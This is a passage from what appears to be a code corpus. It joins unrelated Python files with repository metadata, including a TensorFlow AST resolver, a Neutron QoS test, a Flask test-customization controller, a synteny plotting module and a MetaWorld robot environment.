raise IOError("{0} is not a valid file".format(file_path))
else:
log.error("{0} is not a valid path to a file".format(file_path))
raise IOError("{0} is not a valid path to a file".format(file_path))
log.debug("filetype for {0} identified as {1}".format(file_path, file_type))
return file_type
def is_url(link):
    try:
        urlopen(link)
        return True
    except (ValueError, HTTPError):
        return False
def is_archive(link):
try:
parsed_url = urlparse(link)
if parsed_url.netloc == 'web.archive.org':
return True
except ValueError:
return False
return False
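# Illustrative usage sketch (not part of the original module): classify a local file
# and decide whether a link points to web.archive.org. The arguments are placeholders
# supplied by the caller; the MIME value may be bytes or str depending on the
# installed python-magic version.
def _example_identify(file_path, link):
    mime = filetype(file_path)
    archived = is_url(link) and is_archive(link)
    return mime, archived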
|
elationfoundation/overview_archive
|
overview_archive/utils/identify.py
|
Python
|
gpl-2.0
| 1,836 | 0.001635 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Live value resolution.
Live values are extracted from the known execution context.
Requires activity analysis annotations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.py2tf.pyct import anno
from tensorflow.contrib.py2tf.pyct import transformer
from tensorflow.contrib.py2tf.pyct.static_analysis.annos import NodeAnno
class LiveValueResolver(transformer.Base):
"""Annotates nodes with live values."""
def __init__(self, context, literals):
super(LiveValueResolver, self).__init__(context)
self.literals = literals
def visit_ClassDef(self, node):
self.generic_visit(node)
anno.setanno(node, 'live_val', self.context.namespace[node.name])
return node
def visit_Name(self, node):
self.generic_visit(node)
if isinstance(node.ctx, gast.Load):
assert anno.hasanno(node, NodeAnno.IS_LOCAL), node
symbol_is_local = anno.getanno(node, NodeAnno.IS_LOCAL)
assert anno.hasanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY), node
symbol_is_modified = anno.getanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY)
assert anno.hasanno(node, NodeAnno.IS_PARAM), node
symbol_is_param = anno.getanno(node, NodeAnno.IS_PARAM)
if not symbol_is_local and not symbol_is_param:
if node.id in self.literals:
anno.setanno(node, 'live_val', self.literals[node.id])
elif node.id in self.context.namespace:
obj = self.context.namespace[node.id]
anno.setanno(node, 'live_val', obj)
if hasattr(obj, '__name__'):
# If the symbol value is for example a primitive, then it will not
# have a name.
anno.setanno(node, 'fqn', (obj.__name__,))
else:
pass
# TODO(mdan): Should we raise an error here?
# Can encounter this when:
# * a symbol truly lacks reference
# * a symbol is new, like the new name of a function we just renamed.
else:
pass
# TODO(mdan): Attempt to trace its value through the local chain.
# TODO(mdan): Use type annotations as fallback.
if not symbol_is_modified:
if node.id in self.context.arg_values:
obj = self.context.arg_values[node.id]
anno.setanno(node, 'live_val', obj)
anno.setanno(node, 'fqn', (obj.__class__.__name__,))
return node
def visit_Attribute(self, node):
self.generic_visit(node)
if anno.hasanno(node.value, 'live_val'):
assert anno.hasanno(node.value, 'fqn')
parent_object = anno.getanno(node.value, 'live_val')
if not hasattr(parent_object, node.attr):
raise AttributeError('%s has no attribute %s' % (parent_object,
node.attr))
anno.setanno(node, 'parent_type', type(parent_object))
anno.setanno(node, 'live_val', getattr(parent_object, node.attr))
anno.setanno(node, 'fqn', anno.getanno(node.value, 'fqn') + (node.attr,))
# TODO(mdan): Investigate the role built-in annotations can play here.
elif anno.hasanno(node.value, 'type'):
parent_type = anno.getanno(node.value, 'type')
if hasattr(parent_type, node.attr):
# This should hold for static members like methods.
# This would not hold for dynamic members like function attributes.
# For the dynamic case, we simply leave the node without an annotation,
# and let downstream consumers figure out what to do.
anno.setanno(node, 'parent_type', parent_type)
anno.setanno(node, 'live_val', getattr(parent_type, node.attr))
anno.setanno(node, 'fqn',
anno.getanno(node.value, 'type_fqn') + (node.attr,))
elif isinstance(node.value, gast.Name):
stem_name = node.value
# All nonlocal symbols should be fully resolved.
assert anno.hasanno(stem_name, NodeAnno.IS_LOCAL), stem_name
# TODO(mdan): Figure out what to do when calling attribute on local object
# Maybe just leave as-is?
return node
def resolve(node, context, literals):
return LiveValueResolver(context, literals).visit(node)
|
Xeralux/tensorflow
|
tensorflow/contrib/py2tf/pyct/static_analysis/live_values.py
|
Python
|
apache-2.0
| 4,891 | 0.008587 |
# Copyright 2015 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_utils import uuidutils
from neutron import context
from neutron.objects.qos import policy
from neutron.objects.qos import rule
from neutron.plugins.ml2.drivers.mech_sriov.agent.common import exceptions
from neutron.plugins.ml2.drivers.mech_sriov.agent.extension_drivers import (
qos_driver)
from neutron.tests import base
class QosSRIOVAgentDriverTestCase(base.BaseTestCase):
ASSIGNED_MAC = '00:00:00:00:00:66'
PCI_SLOT = '0000:06:00.1'
def setUp(self):
super(QosSRIOVAgentDriverTestCase, self).setUp()
self.context = context.get_admin_context()
self.qos_driver = qos_driver.QosSRIOVAgentDriver()
self.qos_driver.initialize()
self.qos_driver.eswitch_mgr = mock.Mock()
self.qos_driver.eswitch_mgr.set_device_max_rate = mock.Mock()
self.max_rate_mock = self.qos_driver.eswitch_mgr.set_device_max_rate
self.rule = self._create_bw_limit_rule_obj()
self.qos_policy = self._create_qos_policy_obj([self.rule])
self.port = self._create_fake_port()
def _create_bw_limit_rule_obj(self):
rule_obj = rule.QosBandwidthLimitRule()
rule_obj.id = uuidutils.generate_uuid()
rule_obj.max_kbps = 2
rule_obj.max_burst_kbps = 200
rule_obj.obj_reset_changes()
return rule_obj
def _create_qos_policy_obj(self, rules):
policy_dict = {'id': uuidutils.generate_uuid(),
'tenant_id': uuidutils.generate_uuid(),
'name': 'test',
'description': 'test',
'shared': False,
'rules': rules}
policy_obj = policy.QosPolicy(self.context, **policy_dict)
policy_obj.obj_reset_changes()
return policy_obj
def _create_fake_port(self):
return {'port_id': uuidutils.generate_uuid(),
'profile': {'pci_slot': self.PCI_SLOT},
'device': self.ASSIGNED_MAC}
def test_create_rule(self):
self.qos_driver.create(self.port, self.qos_policy)
self.max_rate_mock.assert_called_once_with(
self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps)
def test_update_rule(self):
self.qos_driver.update(self.port, self.qos_policy)
self.max_rate_mock.assert_called_once_with(
self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps)
def test_delete_rules(self):
self.qos_driver.delete(self.port, self.qos_policy)
self.max_rate_mock.assert_called_once_with(
self.ASSIGNED_MAC, self.PCI_SLOT, 0)
def test__set_vf_max_rate_captures_sriov_failure(self):
self.max_rate_mock.side_effect = exceptions.SriovNicError()
self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT)
def test__set_vf_max_rate_unknown_device(self):
with mock.patch.object(self.qos_driver.eswitch_mgr, 'device_exists',
return_value=False):
self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT)
self.assertFalse(self.max_rate_mock.called)
|
mmnelemane/neutron
|
neutron/tests/unit/plugins/ml2/drivers/mech_sriov/agent/extension_drivers/test_qos_driver.py
|
Python
|
apache-2.0
| 3,672 | 0.001362 |
"""
mod_customized Controllers
===================
In this module, users can test their fork branch with customized set of regression tests
"""
from flask import Blueprint, g, request, redirect, url_for, flash
from github import GitHub, ApiError
from datetime import datetime, timedelta
from decorators import template_renderer, get_menu_entries
from mod_auth.controllers import login_required, check_access_rights
from mod_auth.models import Role, User
from mod_test.models import Fork, Test, TestType, TestPlatform
from mod_customized.forms import TestForkForm
from mod_customized.models import TestFork, CustomizedTest
from mod_regression.models import Category, regressionTestLinkTable, RegressionTest
from mod_test.controllers import get_data_for_test, TestNotFoundException
from mod_auth.controllers import fetch_username_from_token
from sqlalchemy import and_
mod_customized = Blueprint('custom', __name__)
@mod_customized.before_app_request
def before_app_request():
if g.user is not None:
g.menu_entries['custom'] = {
'title': 'Customize Test',
'icon': 'code-fork',
'route': 'custom.index',
'access': [Role.tester, Role.contributor, Role.admin]
}
@mod_customized.route('/', methods=['GET', 'POST'])
@login_required
@check_access_rights([Role.tester, Role.contributor, Role.admin])
@template_renderer()
def index():
"""
Display a form to allow users to run tests.
    User can enter a commit hash or select a commit from their repo that is not more than 30 days old.
    User can customize the test based on selected regression tests and platforms.
    Also displays the list of customized tests started by the user.
User will be redirected to the same page on submit.
"""
fork_test_form = TestForkForm(request.form)
username = fetch_username_from_token()
commit_options = False
if username is not None:
gh = GitHub(access_token=g.github['bot_token'])
repository = gh.repos(username)(g.github['repository'])
# Only commits since last month
last_month = datetime.now() - timedelta(days=30)
commit_since = last_month.isoformat() + 'Z'
commits = repository.commits().get(since=commit_since)
commit_arr = []
for commit in commits:
commit_url = commit['html_url']
commit_sha = commit['sha']
commit_option = (
'<a href="{url}">{sha}</a>').format(url=commit_url, sha=commit_sha)
commit_arr.append((commit_sha, commit_option))
# If there are commits present, display it on webpage
if len(commit_arr) > 0:
fork_test_form.commit_select.choices = commit_arr
commit_options = True
fork_test_form.regression_test.choices = [(regression_test.id, regression_test)
for regression_test in RegressionTest.query.all()]
if fork_test_form.add.data and fork_test_form.validate_on_submit():
import requests
regression_tests = fork_test_form.regression_test.data
commit_hash = fork_test_form.commit_hash.data
repo = g.github['repository']
platforms = fork_test_form.platform.data
api_url = ('https://api.github.com/repos/{user}/{repo}/commits/{hash}').format(
user=username, repo=repo, hash=commit_hash
)
# Show error if github fails to recognize commit
response = requests.get(api_url)
if response.status_code == 500:
fork_test_form.commit_hash.errors.append('Error contacting Github')
elif response.status_code != 200:
fork_test_form.commit_hash.errors.append('Wrong Commit Hash')
else:
add_test_to_kvm(username, commit_hash, platforms, regression_tests)
return redirect(url_for('custom.index'))
populated_categories = g.db.query(regressionTestLinkTable.c.category_id).subquery()
categories = Category.query.filter(Category.id.in_(populated_categories)).order_by(Category.name.asc()).all()
tests = Test.query.filter(and_(TestFork.user_id == g.user.id, TestFork.test_id == Test.id)).order_by(
Test.id.desc()).limit(50).all()
return {
'addTestFork': fork_test_form,
'commit_options': commit_options,
'tests': tests,
'TestType': TestType,
'GitUser': username,
'categories': categories,
'customize': True
}
def add_test_to_kvm(username, commit_hash, platforms, regression_tests):
"""
    Create new tests and add them to CustomizedTest based on the given parameters.
:param username: git username required to find fork
:type username: str
:param commit_hash: commit hash of the repo user selected to run test
:type commit_hash: str
:param platforms: platforms user selected to run test
:type platforms: list
:param regression_tests: regression tests user selected to run tests
:type regression_tests: list
"""
fork_url = ('https://github.com/{user}/{repo}.git').format(
user=username, repo=g.github['repository']
)
fork = Fork.query.filter(Fork.github == fork_url).first()
if fork is None:
fork = Fork(fork_url)
g.db.add(fork)
g.db.commit()
for platform in platforms:
platform = TestPlatform.from_string(platform)
test = Test(platform, TestType.commit, fork.id, 'master', commit_hash)
g.db.add(test)
g.db.commit()
for regression_test in regression_tests:
customized_test = CustomizedTest(test.id, regression_test)
g.db.add(customized_test)
test_fork = TestFork(g.user.id, test.id)
g.db.add(test_fork)
g.db.commit()
|
satyammittal/sample-platform
|
mod_customized/controllers.py
|
Python
|
isc
| 5,822 | 0.002233 |
#!/usr/bin/python
# Copyright 2017 Dhvani Patel
#
# This file is part of UnnaturalCode.
#
# UnnaturalCode is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# UnnaturalCode is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with UnnaturalCode. If not, see <http://www.gnu.org/licenses/>.
from check_eclipse_syntax import checkEclipseSyntax
from compile_error import CompileError
import unittest
ERROR_TEST = """public class HelloWorld {
public static void main(String[] args)
// Prints "Hello, World" to the terminal window.
System.out.println("Hello, World)
}
}
"""
class TestStringMethods(unittest.TestCase):
def test_syntax_ok(self):
toTest = checkEclipseSyntax('public class Hello{ int a= 5;}')
self.assertTrue(toTest is None)
def test_syntax_error(self):
toTest = checkEclipseSyntax(ERROR_TEST)
self.assertEqual(toTest[0], [1, 2, 3, 4, 5])
self.assertEqual(toTest[1], [3, 5, 5, 5, 5])
if __name__ == '__main__':
unittest.main()
|
naturalness/unnaturalcode
|
unnaturalcode/test_eclipse.py
|
Python
|
agpl-3.0
| 1,489 | 0.012089 |
#!/usr/bin/env python3
# -*- coding: utf8 -*-
# Gaik Tamazian, 2019
# mail (at) gtamazian (dot) com
"""Routines for producing synteny plots."""
import gzip
import sys
from functools import reduce
from operator import itemgetter
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.patches import Polygon
from matplotlib.patches import Rectangle
import numpy as np
assert sys.version_info >= (3, 5), "Python 3.5 or higher required"
def load_ref_config(config_fname):
"""
Load configuration of reference genome chromosomes.
    The configuration file contains five whitespace-separated columns:
    1. chromosome name
    2. chromosome ID
    3. chromosome length in bp
    4. start position of the centromere, or None if the centromere
    information is missing
    5. end position of the centromere, or None if the centromere
    information is missing
    :param config_fname: a name of the reference chromosome
    configuration file
    :returns: a list of 5-tuples representing reference genome
    chromosomes; each tuple contains a chromosome name, ID, length in
    bp, and start and end positions of its centromere
"""
r = []
with open(config_fname) as config_file:
for line in config_file:
line = line.rstrip()
chr_name, chr_id, chr_len, cent_s, cent_e = \
line.split(None, 4)
chr_len = int(chr_len)
cent_s = int(cent_s) if cent_s != "None" else None
cent_e = int(cent_e) if cent_e != "None" else None
r.append((chr_name, chr_id, chr_len, cent_s, cent_e))
return r
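# Illustrative sketch (not part of the original module): write a tiny two-line
# configuration with made-up names and coordinates, then parse it back, matching the
# column layout documented above ("None" marks a missing centromere).
def _example_load_ref_config(tmp_fname="example_ref_chromosomes.txt"):
    with open(tmp_fname, "w") as f:
        f.write("chrA ID_A 1000000 450000 550000\n")
        f.write("chrB ID_B 800000 None None\n")
    return load_ref_config(tmp_fname)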
def build_ref_config_file(chr2acc_fname, agp_fnames):
"""
Build a configuration file of reference genome chromosomes from a
chr2acc file and a series of AGP files that describe the assembled
chromosomes.
:param chr2acc_fname: a name of a chr2acc file
:param agp_fnames: a list of reference chromosome AGP files
    :returns: a list of 5-tuples describing the reference chromosomes,
    in the same format as returned by load_ref_config
"""
acc2chr = {}
with open(chr2acc_fname) as chr2acc_file:
acc2chr = {x[1]: x[0] for x in
map(lambda s: s.split('\t', 1),
filter(lambda s: not s.startswith('#'),
map(str.rstrip,
chr2acc_file.readlines())))}
chr_lengths = {}
# values of the chr_centromeres dictionary are 2-tuples of start and
# end positions of a centromere on a chromosome
chr_centromeres = {}
for k in agp_fnames:
with gzip.open(k, "rt") as agp_file:
lines = map(lambda x: (x[0], int(x[1]), int(x[2])) +
tuple(x[3:]),
map(lambda s: s.split('\t', 8),
map(str.rstrip,
filter(lambda s: not s.startswith('#'),
agp_file.readlines()))))
lines = sorted(lines, key=itemgetter(1))
chr_id = set(map(itemgetter(0), lines))
assert len(chr_id) == 1, \
"multiple chromosomes in an AGP file"
chr_id = chr_id.pop()
centromere = list(filter(lambda x: x[6] == "centromere",
lines))
if centromere:
assert len(centromere) == 1, "multiple centromeres"
centromere = centromere[0]
cent_start, cent_end = centromere[1], centromere[2]
assert chr_id not in chr_centromeres or \
chr_centromeres[chr_id] == (cent_start, cent_end), \
"conflicting centromere records"
chr_centromeres[chr_id] = (cent_start, cent_end)
else:
chr_centromeres[chr_id] = (None, None)
chr_len = lines[-1][2]
assert chr_id not in chr_lengths or \
chr_lengths[chr_id] == chr_len, \
"conflicting chromosome lengths"
chr_lengths[chr_id] = chr_len
return [(v, k, chr_lengths[k]) + chr_centromeres[k]
for k, v in acc2chr.items()]
def plot_frame(ref_chrom_config, p):
"""
Plot a frame of reference chromosomes for synteny blocks based on
them.
:param ref_chrom_config: a list of 5-tuples describing the reference
chromosomes as returned by the load_ref_config function.
:param p: a plotting parameter; its value should be between 10 and
100
:returns: a 2-tuple which first element is the plot frame Figure
object and the second element is the list of the AxesSubplot
objects
"""
fig, axes = plt.subplots(ncols=1, nrows=len(ref_chrom_config))
max_len = reduce(max, map(itemgetter(2), ref_chrom_config))
shift = max_len / 30
for ax, chrom in zip(axes, ref_chrom_config):
chr_name, _, chr_len, _, _ = chrom
ax.set_xlim([-shift, max_len])
ax.set_ylim([-p, p])
ax.axis('off')
ax.text(-shift, 0, chr_name, horizontalalignment="right",
verticalalignment="center")
ax.add_line(Line2D([0, chr_len], [0, 0], color="black",
linewidth=0.5))
return fig, axes
def add_centromeres(fig, ref_chrom_config, p, style):
"""
Add centromeres to a reference chromosome frame.
:param fig: a Figure object of a reference chromosome frame
:param ref_chrom_config: a list of 5-tuples describing the reference
chromosomes as returned by the load_ref_config function
    :param p: a plotting parameter; its value should be between 10 and
    100
    :param style: centromere marker style, either "triangle" or "butterfly"
:returns: the Figure object of the reference chromosome frame with
added centromeres
"""
assert style in {"triangle", "butterfly"}, \
"incorrect centromere style"
for ax, chrom in zip(fig.get_axes(), ref_chrom_config):
_, _, _, cent_s, cent_e = chrom
if cent_s is not None and cent_e is not None:
ax.add_patch(Polygon(np.array(
[[cent_s, p], [cent_e, p],
[(cent_s + cent_e)/2, p/5]]), color="black"))
if style == "butterfly":
ax.add_patch(Polygon(np.array(
[[cent_s, -p], [cent_e, -p],
[(cent_s + cent_e)/2, -p/5]]), color="black"))
return fig
def extend_frame(axes, p):
"""
Extend a reference chromosome frame to add one more track of
synteny blocks.
:param axes: a list of the AxesSubplot objects returned by the
plot_frame function
:param p: a plotting parameter; its value should be between 150
and 300
:returns: the list of the AxesSubplot objects which correspond to
the extended reference chromosome frame
"""
for ax in axes:
y_min, y_max = ax.get_ylim()
y_min -= 2*p
ax.set_ylim((y_min, y_max))
return axes
def add_synteny_block(ref_chrom_config, axes, chrom, start, end,
strand, e_color, f_color, p):
"""
Add a synteny block to the reference chromosome frame.
:param ref_chrom_config: a list of 5-tuples describing the reference
chromosomes as returned by the load_ref_config function
:param axes: a list of the AxesSubplot objects returned by the
plot_frame function
:param chrom: the chromosome a syntenic block is located on
:param start: the start position of a syntenic block
:param end: the end position of a syntenic block
:param strand: the syntenic block orientation ('+', '-', or None)
:param e_color: color of the block edge
:param f_color: color the block is filled in
:param p: a plotting parameter; its value should be between 150 and
300
:returns: the list of the AxesSubplot objects with the added synteny
block
"""
global_x_max = reduce(max, map(lambda x: x.get_xlim()[1], axes))
alpha = global_x_max / 100
chr_dict = {v: k for k, v in enumerate(map(itemgetter(1),
ref_chrom_config))}
ax = axes[chr_dict[chrom]]
_, x_max = ax.get_xlim()
y_min, _ = ax.get_ylim()
assert strand is None or strand in {'+', '-'}, "incorrect strand"
l = end - start
if l < global_x_max / 300:
return axes
if strand is None:
r = Rectangle((start, y_min + p/4),
height=3*p/2, width=end-start,
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
ax.add_patch(r)
else:
alpha = x_max/(2*p)
if strand == '+':
if l > alpha:
p = Polygon(np.array([[start, y_min + 7*p/4],
[end - alpha, y_min + 7*p/4],
[end, y_min + p],
[end - alpha, y_min + p/4],
[start, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
else:
p = Polygon(np.array([[start, y_min + 7*p/4],
                                  [end, y_min + p],
[start, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
else:
if l > alpha:
p = Polygon(np.array([[end, y_min + 7*p/4],
[start + alpha, y_min + 7*p/4],
[start, y_min + p],
[start + alpha, y_min + p/4],
[end, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
else:
p = Polygon(np.array([[end, y_min + 7*p/4],
[start, y_min + p],
[end, y_min + p/4]]),
edgecolor=e_color, facecolor=f_color,
fill=True, linewidth=0.5)
ax.add_patch(p)
return axes
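# Illustrative sketch (not part of the original module): the intended pipeline for the
# helpers above, assuming a configuration file and an iterable of
# (chromosome ID, start, end, strand) blocks are available. The p values follow the
# ranges suggested in the docstrings; the colors and output name are arbitrary.
def _example_synteny_plot(config_fname, blocks, out_fname="synteny.png"):
    ref = load_ref_config(config_fname)
    fig, axes = plot_frame(ref, p=50)
    fig = add_centromeres(fig, ref, p=50, style="triangle")
    axes = extend_frame(axes, p=200)
    for chrom_id, start, end, strand in blocks:
        axes = add_synteny_block(ref, axes, chrom_id, start, end, strand,
                                 e_color="black", f_color="steelblue", p=200)
    fig.savefig(out_fname)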
|
gtamazian/bioformats
|
bioformats/synteny_plot.py
|
Python
|
mit
| 10,165 | 0.000197 |
# This file is generated by /tmp/buildd/python-numpy-1.8.2/setup.py
# It contains system_info results at the time of building this package.
__all__ = ["get_info","show"]
blas_info={'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'language': 'f77'}
lapack_info={'libraries': ['lapack'], 'library_dirs': ['/usr/lib'], 'language': 'f77'}
atlas_threads_info={}
blas_opt_info={'libraries': ['blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'}
openblas_info={}
atlas_blas_threads_info={}
lapack_opt_info={'libraries': ['lapack', 'blas'], 'library_dirs': ['/usr/lib'], 'define_macros': [('NO_ATLAS_INFO', 1)], 'language': 'f77'}
atlas_info={}
lapack_mkl_info={}
blas_mkl_info={}
atlas_blas_info={}
mkl_info={}
def get_info(name):
g = globals()
return g.get(name, g.get(name + "_info", {}))
def show():
for name,info_dict in globals().items():
if name[0] == "_" or type(info_dict) is not type({}): continue
print(name + ":")
if not info_dict:
print(" NOT AVAILABLE")
for k,v in info_dict.items():
v = str(v)
if k == "sources" and len(v) > 200:
v = v[:60] + " ...\n... " + v[-60:]
print(" %s = %s" % (k,v))
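# Illustrative usage sketch (not part of the generated file): these helpers are
# normally reached through numpy itself, e.g. numpy.__config__.show().
if __name__ == "__main__":
    show()                           # print every recorded build-time info block
    print(get_info("lapack_opt"))    # one block as a dict, here lapack_opt_info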
|
ruibarreira/linuxtrail
|
usr/lib/python2.7/dist-packages/numpy/distutils/__config__.py
|
Python
|
gpl-3.0
| 1,269 | 0.020489 |
import numpy as np
from gym.spaces import Box
from metaworld.envs import reward_utils
from metaworld.envs.asset_path_utils import full_v2_path_for
from metaworld.envs.mujoco.sawyer_xyz.sawyer_xyz_env import SawyerXYZEnv, _assert_task_is_set
class SawyerHammerEnvV2(SawyerXYZEnv):
HAMMER_HANDLE_LENGTH = 0.14
def __init__(self):
hand_low = (-0.5, 0.40, 0.05)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.1, 0.4, 0.0)
obj_high = (0.1, 0.5, 0.0)
goal_low = (0.2399, .7399, 0.109)
goal_high = (0.2401, .7401, 0.111)
super().__init__(
self.model_name,
hand_low=hand_low,
hand_high=hand_high,
)
self.init_config = {
'hammer_init_pos': np.array([0, 0.5, 0.0]),
'hand_init_pos': np.array([0, 0.4, 0.2]),
}
self.goal = self.init_config['hammer_init_pos']
self.hammer_init_pos = self.init_config['hammer_init_pos']
self.obj_init_pos = self.hammer_init_pos.copy()
self.hand_init_pos = self.init_config['hand_init_pos']
self.nail_init_pos = None
self._random_reset_space = Box(np.array(obj_low), np.array(obj_high))
self.goal_space = Box(np.array(goal_low), np.array(goal_high))
@property
def model_name(self):
return full_v2_path_for('sawyer_xyz/sawyer_hammer.xml')
@_assert_task_is_set
def evaluate_state(self, obs, action):
(
reward,
reward_grab,
reward_ready,
reward_success,
success
) = self.compute_reward(action, obs)
info = {
'success': float(success),
'near_object': reward_ready,
'grasp_success': reward_grab >= 0.5,
'grasp_reward': reward_grab,
'in_place_reward': reward_success,
'obj_to_target': 0,
'unscaled_reward': reward,
}
return reward, info
def _get_id_main_object(self):
return self.unwrapped.model.geom_name2id('HammerHandle')
def _get_pos_objects(self):
return np.hstack((
self.get_body_com('hammer').copy(),
self.get_body_com('nail_link').copy()
))
def _get_quat_objects(self):
return np.hstack((
self.sim.data.get_body_xquat('hammer'),
self.sim.data.get_body_xquat('nail_link')
))
def _set_hammer_xyz(self, pos):
qpos = self.data.qpos.flat.copy()
qvel = self.data.qvel.flat.copy()
qpos[9:12] = pos.copy()
qvel[9:15] = 0
self.set_state(qpos, qvel)
def reset_model(self):
self._reset_hand()
# Set position of box & nail (these are not randomized)
self.sim.model.body_pos[self.model.body_name2id(
'box'
)] = np.array([0.24, 0.85, 0.0])
# Update _target_pos
self._target_pos = self._get_site_pos('goal')
# Randomize hammer position
self.hammer_init_pos = self._get_state_rand_vec() if self.random_init \
else self.init_config['hammer_init_pos']
self.nail_init_pos = self._get_site_pos('nailHead')
self.obj_init_pos = self.hammer_init_pos.copy()
self._set_hammer_xyz(self.hammer_init_pos)
return self._get_obs()
@staticmethod
def _reward_quat(obs):
        # Ideal laid-down hammer has quat [1, 0, 0, 0]
# Rather than deal with an angle between quaternions, just approximate:
ideal = np.array([1., 0., 0., 0.])
error = np.linalg.norm(obs[7:11] - ideal)
return max(1.0 - error / 0.4, 0.0)
@staticmethod
def _reward_pos(hammer_head, target_pos):
pos_error = target_pos - hammer_head
a = 0.1 # Relative importance of just *trying* to lift the hammer
b = 0.9 # Relative importance of hitting the nail
lifted = hammer_head[2] > 0.02
in_place = a * float(lifted) + b * reward_utils.tolerance(
np.linalg.norm(pos_error),
bounds=(0, 0.02),
margin=0.2,
sigmoid='long_tail',
)
return in_place
def compute_reward(self, actions, obs):
hand = obs[:3]
hammer = obs[4:7]
hammer_head = hammer + np.array([.16, .06, .0])
# `self._gripper_caging_reward` assumes that the target object can be
# approximated as a sphere. This is not true for the hammer handle, so
# to avoid re-writing the `self._gripper_caging_reward` we pass in a
# modified hammer position.
# This modified position's X value will perfect match the hand's X value
# as long as it's within a certain threshold
hammer_threshed = hammer.copy()
threshold = SawyerHammerEnvV2.HAMMER_HANDLE_LENGTH / 2.0
if abs(hammer[0] - hand[0]) < threshold:
hammer_threshed[0] = hand[0]
reward_quat = SawyerHammerEnvV2._reward_quat(obs)
reward_grab = self._gripper_caging_reward(
actions, hammer_threshed,
object_reach_radius=0.01,
obj_radius=0.015,
pad_success_thresh=0.02,
xz_thresh=0.01,
high_density=True,
)
reward_in_place = SawyerHammerEnvV2._reward_pos(
hammer_head,
self._target_pos
)
reward = (2.0 * reward_grab + 6.0 * reward_in_place) * reward_quat
# Override reward on success. We check that reward is above a threshold
# because this env's success metric could be hacked easily
success = self.data.get_joint_qpos('NailSlideJoint') > 0.09
if success and reward > 5.:
reward = 10.0
return (
reward,
reward_grab,
reward_quat,
reward_in_place,
success,
)
|
rlworkgroup/metaworld
|
metaworld/envs/mujoco/sawyer_xyz/v2/sawyer_hammer_v2.py
|
Python
|
mit
| 5,835 | 0.000343 |
from random import randint
import os
PAN_HOST = "pan.baidu.com"
PAN_INDEX = "http://" + PAN_HOST
DISK_HOME = PAN_INDEX + '/disk/home'
FILE_MANAGER = PAN_INDEX + "/api/filemanager"
CLOUD_DL = PAN_INDEX + "/rest/2.0/services/cloud_dl"
PASSPORT_HOST = 'passport.baidu.com'
PASSPORT_INDEX = "https://" + PASSPORT_HOST
PASSPORT_API = PASSPORT_INDEX + "/v2/api"
USERAGENTLIST = [ 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.71 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',]
USERAGENT = USERAGENTLIST[randint(0,len(USERAGENTLIST)-1)]
GREEN = u"\033[42m%s\033[m"
BLUE = u"\033[44m%s\033[m"
RED = u"\033[41m%s\033[0m"
WHITE= u"%s"
SAVINGPATH = os.path.expanduser("~/Downloads")
|
xiviwo/baiducloud
|
const.py
|
Python
|
gpl-3.0
| 977 | 0.012282 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from wtforms import validators
from jinja2 import Markup
from flask.ext.admin.contrib.sqla import ModelView
from studio.core.engines import db
from suibe.models import SlideModel, ArticleModel
from .forms import CKTextAreaField
class Article(ModelView):
create_template = 'panel/article_edit.html'
edit_template = 'panel/article_edit.html'
column_labels = {'id': 'ID',
'title': '标题',
'is_sticky': '置顶',
'channel': '频道',
'date_published': '发布时间',
'date_created': '创建时间'}
column_list = ['id', 'channel', 'is_sticky', 'title',
'date_published', 'date_created']
column_searchable_list = ['title', ]
column_default_sort = ('date_published', True)
form_extra_fields = {
'content': CKTextAreaField('内容',
validators=[validators.Required()]),
}
def __init__(self, **kwargs):
super(Article, self).__init__(ArticleModel, db.session, **kwargs)
def create_form(self, obj=None):
form = super(Article, self).create_form()
delattr(form, 'date_created')
return form
def edit_form(self, obj=None):
form = super(Article, self).edit_form(obj=obj)
delattr(form, 'date_created')
return form
class Slide(ModelView):
column_labels = {'id': 'ID',
'order': '排序',
